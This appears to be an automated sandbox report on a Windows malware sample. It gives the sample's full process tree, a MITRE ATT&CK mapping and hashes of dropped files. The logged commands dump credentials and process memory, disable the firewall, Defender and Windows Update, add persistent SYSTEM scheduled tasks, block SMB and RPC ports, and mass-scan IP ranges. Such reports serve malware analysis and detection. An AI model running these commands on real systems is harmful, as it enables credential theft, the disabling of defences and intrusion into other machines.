- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:2728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3040
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3032
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2900
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2884
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2332
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\uvfsybaen\spfyirlfq\wpcap.exe /S2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\uvfsybaen\spfyirlfq\wpcap.exeC:\Windows\uvfsybaen\spfyirlfq\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
PID:2776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵PID:1700
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1048
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵PID:2024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2952 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:2932
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2148 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2144 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2328
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2540 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:876 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2484
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\uvfsybaen\spfyirlfq\ensatjbpg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\uvfsybaen\spfyirlfq\Scant.txt2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1704 -
C:\Windows\uvfsybaen\spfyirlfq\ensatjbpg.exeC:\Windows\uvfsybaen\spfyirlfq\ensatjbpg.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\uvfsybaen\spfyirlfq\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\uvfsybaen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\uvfsybaen\Corporate\log.txt2⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1780 -
C:\Windows\uvfsybaen\Corporate\vfshost.exeC:\Windows\uvfsybaen\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bcvtnumjz" /ru system /tr "cmd /c C:\Windows\ime\lgeptip.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1692
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bcvtnumjz" /ru system /tr "cmd /c C:\Windows\ime\lgeptip.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2232
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "unepnrlli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\knalbupn\lgeptip.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2016
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "unepnrlli" /ru system /tr "cmd /c echo Y|cacls C:\Windows\knalbupn\lgeptip.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nsgcvbesg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hijqerzbn\yerzvn.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1584
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nsgcvbesg" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\hijqerzbn\yerzvn.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2108
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1488
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2224
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3040
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2716
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2604
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2292
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2896
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1560
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:2660
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
PID:1640
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:2940
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:1484
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
PID:2080 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1164
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
PID:2872 -
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
PID:876 -
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- Modifies data under HKEY_USERS
PID:1036
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
PID:1800 -
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
PID:788 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
PID:704
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
PID:1956 -
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:1260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:1120
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:1224
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:780
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:1804
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:2572 -
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:3024
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1812 -
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1216 -
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
PID:1540 -
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1728
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1736
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 556 C:\Windows\TEMP\uvfsybaen\556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2404
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 1124 C:\Windows\TEMP\uvfsybaen\1124.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 1176 C:\Windows\TEMP\uvfsybaen\1176.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2892
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 1228 C:\Windows\TEMP\uvfsybaen\1228.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 1612 C:\Windows\TEMP\uvfsybaen\1612.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2192
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 1748 C:\Windows\TEMP\uvfsybaen\1748.dmp2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\TEMP\uvfsybaen\rpuessgip.exeC:\Windows\TEMP\uvfsybaen\rpuessgip.exe -accepteula -mp 1632 C:\Windows\TEMP\uvfsybaen\1632.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\uvfsybaen\spfyirlfq\scan.bat2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:708 -
C:\Windows\uvfsybaen\spfyirlfq\yqnmnukbh.exeyqnmnukbh.exe TCP 181.215.0.1 181.215.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2468
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
PID:1804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3356
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:1004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3312
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2340
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3116
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3260
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
C:\Windows\system32\taskeng.exetaskeng.exe {2E386B50-FB09-4E2C-B7D2-798528B05130} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:928
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\knalbupn\lgeptip.exe /p everyone:F2⤵PID:2776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2024
-
-
C:\Windows\system32\cacls.execacls C:\Windows\knalbupn\lgeptip.exe /p everyone:F3⤵PID:1208
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hijqerzbn\yerzvn.exe /p everyone:F2⤵PID:1740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2476
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\hijqerzbn\yerzvn.exe /p everyone:F3⤵PID:2164
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\lgeptip.exe2⤵PID:1528
-
C:\Windows\ime\lgeptip.exeC:\Windows\ime\lgeptip.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2952
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\hijqerzbn\yerzvn.exe /p everyone:F2⤵PID:1932
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1328
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\hijqerzbn\yerzvn.exe /p everyone:F3⤵PID:1660
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\knalbupn\lgeptip.exe /p everyone:F2⤵PID:2316
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:876
-
-
C:\Windows\system32\cacls.execacls C:\Windows\knalbupn\lgeptip.exe /p everyone:F3⤵PID:2528
-
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\lgeptip.exe2⤵PID:2008
-
C:\Windows\ime\lgeptip.exeC:\Windows\ime\lgeptip.exe3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2036
-
-
-
C:\Windows\SysWOW64\ooeaya.exeC:\Windows\SysWOW64\ooeaya.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:644
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Subvert Trust Controls
1Install Root Certificate
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
1.4MB
MD5da7221c49fc5b33b7e3f52051b31e577
SHA1a4505e38f0466a7aba92f9ee86fc594c4e60d835
SHA2564ca807574f68c9ab1b15979f7bc74b1a8bf9e1062bef44fcc5f8506d79fe412b
SHA51227618fdbb55d7c1202b30f8915717a7e21636619b20ead1ae346415539fda2a052cf7f468caf3ec482f6a71ec5f34f2cbd59807b75b47daeec52f66768b6e3ec
-
Filesize
1.3MB
MD563e7be14591f1b7e8dbbf2e2a237a621
SHA1abbd5c33fd11bf9e4007d413621228722335bac8
SHA2561e25268d66a298f838a3aa162e3867169d9e7a75005bb5f83882da16b4dcb8e7
SHA512096ccf75af2e0cd7ad66aeae70fc6fd21dc893dc796e4b9e138e48d494ce4c84a1fa0be3900e353445ca5059bdc81941d49105b5429a782bd490cac5debbca8f
-
Filesize
5.2MB
MD539c1027fd0f8fba9df387d733402eaee
SHA1c3a1ca94dcdd1793dd84398857d9f76b0550ef02
SHA2562b9c3344cf5c1c9ae0909f4a507db33071fe2e8f01553ff6b7626fe88fe45c1e
SHA5122388b9dcbb5ea3e21bb39dee682fa53675b942e65bb8c2f7d00936ac5e812940167056b5891a4a19752ef22a36485024e3ae2ced710a8102a96a47a358e473d6
-
Filesize
3.9MB
MD55d123d9c70d15d664c3c56022aa64184
SHA15298f38569f804ad377816c151fe7a9899cae95b
SHA2563c96626581be0c69ba0af86f2259bd1edf712aa4dfaff4d837609ee0d8533cad
SHA5122afc878e7f9e5ed122f99c82bbde57d91e91a7ee3bd7973a5dcdb0ce8bd39e5bd716a36e1980597f495cb07d54e85375516193a3497b8253e1170439f73cd644
-
Filesize
7.2MB
MD5df60843c793bf908cb51f9df33d5feef
SHA1a1f2fc07a94050e7d12d8dd50171b26d76475ce9
SHA256ab27ad35396e5db08250328e4ca088b509bcc8a791ed639e8a21f46d31f38437
SHA5126a1eb9579cc79bd7264670bcfc61ce74968c57b4fc13b97f33aed55018b06ed548a6ec47cc835ab7b7a28b7130ad8866f9be46e0b1a6542615e9093a9d7bb883
-
Filesize
2.1MB
MD5900b917d1a34e56e41da0ceee70eba81
SHA16ea2e39a0c3fb9f8e893bc50620aa1102e66d57f
SHA25626498bea69f9371625c34030be286d8b46b3aba746eee44ba2b0f0ad7c9dbf32
SHA512ff9bb19c073cc07016fe09a3f73c7f94e4935c7adc9633f06930ac5146c8ccb6e5ec7000bd1360580076b7cb38caa5b9854efcba072cad8052a438de797f0cd5
-
Filesize
4.6MB
MD52222b33a777d4136673c5ffe36926e1a
SHA1f4b3cd723653e985dc6ac9f72a56a41af272e7e6
SHA2569975994593f09c57a8d26093d9a9b5ded7a4bb8a0887113d6f8183bdbc4f5301
SHA512f28c3a66d64d32fbcd1d630f2e281a7c55041042b6e3bf4fd11138ed207384705af822895b231be5923901c3d119ef2c5ce33a97c035e921184f0abf0f351123
-
Filesize
975B
MD5b5d815ff5310f62de5020591be598bc0
SHA18013562b0cc2516d16d474308c8982a31b7f5dd0
SHA256a7ea603e6e80aed429a34b68ca8210ae3b082cf6104646ed7f8025c3b304ae85
SHA5124e3175ef0c289e1beea60f51239a98533690505b709f778703502dad3f72e3c7e9aa26e1a3837712ed5e1344e28e5ccff1d63a1245352bbc8435a71e15347a94
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
185B
MD57d5eec6e4216c2b8f5a4c09049329bd4
SHA14ba0a28ad2e172cbe15140dcea62a05bf0b92f04
SHA25664d2afc41881160f60d18b722196e88c981d4a0e7ec6321196a35e09eff6c606
SHA5127d1a13c4b83af4c7039d8bb6884fb9563b26d020a9fae31e9c4d570510025bfcba4ae235a9ca0fa97805b546406d375601689af387e262e87a9e6fdb0e691c2b
-
Filesize
159B
MD56ab3aaa2142e5485d5f9f76fa925defe
SHA106a5a3999ecf1f366ee6c785f5bf837531a94a71
SHA256b2b24cdbc5b84f2bb44b8d24e3be28916c72389d860b4404c15a0fcc842bf322
SHA512ebf96ef613248e76170e044b8df56ac807c7e46453a1fc078d46cbb213ca2822bb588f87d8e1f754a73f3a84e23ad7382da9142d940e5cddf6cf3471677d2107
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
7.5MB
MD55700e27d7fc60262d81c42e681bebf7d
SHA1e95c4622d57c96e88a8e3330f2aad50734e09a7b
SHA256b7526f244a798c845fc768b3726b99ef2d5cec6d7070f8fc8c0556cc91430c83
SHA512d710392a72ec022c88ada5ebaeaffdb959cbef2f4d2bdef73163cc945f2114e9b59ba8fb46f33d27cedfb7a6cb455dbd441d380a4b8516b4df11167095d46533
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
